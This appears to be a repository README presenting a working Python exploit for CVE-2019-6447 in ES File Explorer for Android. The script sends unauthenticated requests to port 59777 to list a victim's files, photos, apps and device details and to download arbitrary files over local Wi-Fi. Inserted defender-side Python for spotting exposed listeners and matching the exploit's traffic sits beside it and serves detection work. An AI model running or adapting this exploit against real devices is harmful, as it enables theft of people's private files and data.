EsFileExplorer-CVE-2019-6447

Exploiting Android Vulnerability in ES File Explorer

Vulnerability

ES File Explorer was created by ES Worldwide, which is part of DO Global and is based in China. The app is available only for mobile devices running the Android operating system. ES File Explorer has been downloaded more than 100 million times in total; as Android's best-known file explorer it gets a lot of attention. In 2019, cybersecurity researchers discovered a vulnerability in ES File Explorer version 4.1.9.7.4. Attackers able to exploit that vulnerability can collect all of the sensitive user data saved in ES File Explorer, including photographs, videos, voice recordings, documents, and other data types.

Vulnerability Description

Through version 4.1.9.7.4, the ES File Explorer File Manager application for Android allows remote attackers on the local Wi-Fi network to read arbitrary files or run apps by sending requests to TCP port 59777. Once the ES application has been launched just once, this TCP port remains open and replies to unauthenticated application/json data sent over HTTP.

Affected Version

Versions through 4.1.9.7.4

Every time the user launches the app, an HTTP server is started. This server listens locally on port 59777:
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop
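The netstat line above is the quickest way to confirm on a device whether the service is exposed: the local address `:::59777` means the socket is bound to every interface, not just loopback. As an added defender-side check that is not part of the original repository, the following Python parses `netstat -ap` output in that format and reports which processes listen on the ES File Explorer port and whether the bind address is reachable from the LAN. The sample netstat text is constructed for the example (its first line mirrors the one shown above); the function names are my own.

```python
# TCP port opened by ES File Explorer's built-in HTTP server (from the advisory text above)
ES_PORT = 59777

def parse_netstat(netstat_output):
    """Yield (proto, local, foreign, state, pid, prog) for each TCP socket line of `netstat -ap`."""
    for line in netstat_output.splitlines():
        fields = line.split()
        # TCP lines have 7 columns: proto recv-q send-q local foreign state pid/program
        if len(fields) != 7 or not fields[0].startswith("tcp"):
            continue
        pid, _, prog = fields[6].partition("/")
        if not pid.isdigit():
            continue  # netstat prints '-' when the process is not visible to the caller
        yield fields[0], fields[3], fields[4], fields[5], int(pid), prog

def split_addr(addr):
    """Split 'host:port' as printed by netstat (IPv4 or IPv6) into (host, port)."""
    host, _, port = addr.rpartition(":")
    return host, int(port)

def find_listeners(netstat_output, port=ES_PORT):
    """Return [(pid, program, bind_host)] for sockets in LISTEN state on `port`."""
    hits = []
    for _proto, local, _foreign, state, pid, prog in parse_netstat(netstat_output):
        if state != "LISTEN":
            continue
        host, lport = split_addr(local)
        if lport == port:
            hits.append((pid, prog, host))
    return hits

def is_exposed(netstat_output, port=ES_PORT):
    """True if `port` is bound to a wildcard address ('::' or '0.0.0.0'), i.e. reachable from the network."""
    return any(host in ("::", "0.0.0.0") for _, _, host in find_listeners(netstat_output, port))

# Constructed sample in the format of `netstat -ap | grep com.estrongs` shown above,
# plus one loopback-only listener to show the contrast
SAMPLE = """\
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN      1234/adbd
"""

if __name__ == "__main__":
    for pid, prog, host in find_listeners(SAMPLE):
        print(f"{prog} (pid {pid}) listening on {host}:{ES_PORT}")
    print("LAN-exposed:", is_exposed(SAMPLE))
```

Run it against real `netstat -ap` output captured from the device (or `ss -ltnp` reformatted to the same columns); a hit on port 59777 bound to `::` or `0.0.0.0` while the app is installed is exactly the condition the advisory describes.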

Proof of Concept (PoC) Features

  • List all the files on the SD card of the victim device
  • List all the pictures on the victim device
  • List all the videos on the victim device
  • List all the audio files on the victim device
  • List all the apps installed on the victim device
  • List all the system apps installed on the victim device
  • List all the phone apps installed on the victim device
  • List all the APK files stored on the SD card of the victim device
  • List all the apps installed on the victim device (all categories)
  • Get device info of the victim device
  • Pull a file from the victim device
  • Launch an app of your choice
  • Get the icon of an app of your choice

Payload

import requests
import json
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

# The ES File Explorer HTTP service listens on TCP 59777 once the app has been opened
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles', 'listPics', 'listVideos', 'listAudios', 'listApps', 'listAppsSystem',
        'listAppsPhone', 'listAppsSdcard', 'listAppsAll', 'getFile', 'getDeviceInfo']
listCmds = cmds[:9]  # the listing commands all return a JSON array of records
if cmd not in cmds:
    print("[-] WRONG COMMAND!")
    print("Available commands : ")
    print("  listFiles         : List all Files.")
    print("  listPics          : List all Pictures.")
    print("  listVideos        : List all videos.")
    print("  listAudios        : List all audios.")
    print("  listApps          : List Applications installed.")
    print("  listAppsSystem    : List System apps.")
    print("  listAppsPhone     : List Communication related apps.")
    print("  listAppsSdcard    : List apps on the SDCard.")
    print("  listAppsAll       : List all Application.")
    print("  getFile           : Download a file.")
    print("  getDeviceInfo     : Get device info.")
    sys.exit(1)

print("\n==================================================================")
print("|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |")
print("|                Coded By : Nehal a.k.a PwnerSec                 |")
print("==================================================================\n")

header = {"Content-Type": "application/json"}
# Not used by the requests below
proxy = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}

def httpPost(cmd):
    # The service accepts an unauthenticated JSON body of the form {"command": "<name>"}
    data = json.dumps({"command": cmd})
    response = requests.post(url, headers=header, data=data)
    # The reply is JSON, so decode it as JSON (true/false/null are not Python literals)
    return response.json()

def parse(text, keys):
    # Print the selected keys of every record returned by a listing command
    for dic in text:
        for key in keys:
            print(f"{key} : {dic[key]}")
        print('')

def do_listing(cmd):
    response = httpPost(cmd)
    # Take the column names from the first record; an empty list has no columns
    if len(response) == 0:
        keys = []
    else:
        keys = list(response[0].keys())
    parse(response, keys)

if cmd in listCmds:
    do_listing(cmd)

elif cmd == cmds[9]:
    # getFile: the service serves a file at an absolute path directly via GET
    if len(sys.argv) != 4:
        print("[+] Include file name to download.")
        sys.exit(1)
    elif sys.argv[3][0] != '/':
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    else:
        path = sys.argv[3]
        print("[+] Downloading file...")
        response = requests.get(url + path)
        with open('out.dat', 'wb') as wf:
            wf.write(response.content)
        print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    # getDeviceInfo returns a single JSON object rather than a list
    response = httpPost(cmd)
    keys = list(response.keys())
    for key in keys:
        print(f"{key} : {response[key]}")
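From a detection standpoint, the traffic the payload above generates is easy to recognise: unauthenticated POSTs to TCP 59777 carrying a JSON body with a `command` key from the fixed set the service understands, and GETs of absolute filesystem paths on the same port for file retrieval. The following Python, added here as an example and not part of the original repository, runs that logic over a handful of constructed HTTP request records in the shape a web proxy or IDS might log. The record format, the function names and the sample addresses and paths are my own assumptions.

```python
import json

# Port of the ES File Explorer HTTP service (from the advisory text above)
ES_PORT = 59777
# Command names the service answers, taken from the payload's command table
ES_COMMANDS = {
    "listFiles", "listPics", "listVideos", "listAudios", "listApps", "listAppsSystem",
    "listAppsPhone", "listAppsSdcard", "listAppsAll", "getFile", "getDeviceInfo",
}

def classify_request(req):
    """Return a finding dict for one HTTP request record, or None if it is unrelated.

    `req` is a constructed record with keys: src, dst, dport, method, path, content_type, body.
    """
    if req.get("dport") != ES_PORT:
        return None
    if req.get("method") == "POST":
        # A command request is a JSON object {"command": "<name>"}; anything else is ignored
        try:
            body = json.loads(req.get("body") or "")
        except ValueError:
            return None
        command = body.get("command") if isinstance(body, dict) else None
        if command in ES_COMMANDS:
            return {"src": req["src"], "dst": req["dst"], "kind": "es-command", "detail": command}
        return None
    if req.get("method") == "GET" and req.get("path", "").startswith("/") and req["path"] != "/":
        # File retrieval: the path requested is an absolute path on the device's filesystem
        return {"src": req["src"], "dst": req["dst"], "kind": "es-file-read", "detail": req["path"]}
    return None

def scan(request_log):
    """Run classify_request over a list of records and return the findings in order."""
    return [finding for finding in map(classify_request, request_log) if finding]

# Constructed sample records: two ES commands, one file read, and one unrelated request
SAMPLE_LOG = [
    {"src": "192.168.1.20", "dst": "192.168.1.50", "dport": 59777, "method": "POST", "path": "/",
     "content_type": "application/json", "body": '{"command":"listFiles"}'},
    {"src": "192.168.1.20", "dst": "192.168.1.50", "dport": 59777, "method": "POST", "path": "/",
     "content_type": "application/json", "body": '{"command":"getDeviceInfo"}'},
    {"src": "192.168.1.20", "dst": "192.168.1.50", "dport": 59777, "method": "GET",
     "path": "/sdcard/DCIM/Camera/IMG_0001.jpg", "content_type": "", "body": ""},
    {"src": "192.168.1.20", "dst": "192.168.1.60", "dport": 80, "method": "POST", "path": "/api",
     "content_type": "application/json", "body": '{"command":"listFiles"}'},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['src']} -> {finding['dst']}: {finding['kind']} {finding['detail']}")
```

The same two conditions translate directly into a network signature (destination port 59777, HTTP POST with `"command"` in a JSON body; or an HTTP GET whose path begins with `/` and is not the root) for an IDS that decodes HTTP, and a burst of `es-command` findings followed by `es-file-read` findings from one source is the sequence the payload above produces.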

Demonstration

Demo

Contact Me

Follow me on Twitter!
Connect with me on LinkedIn!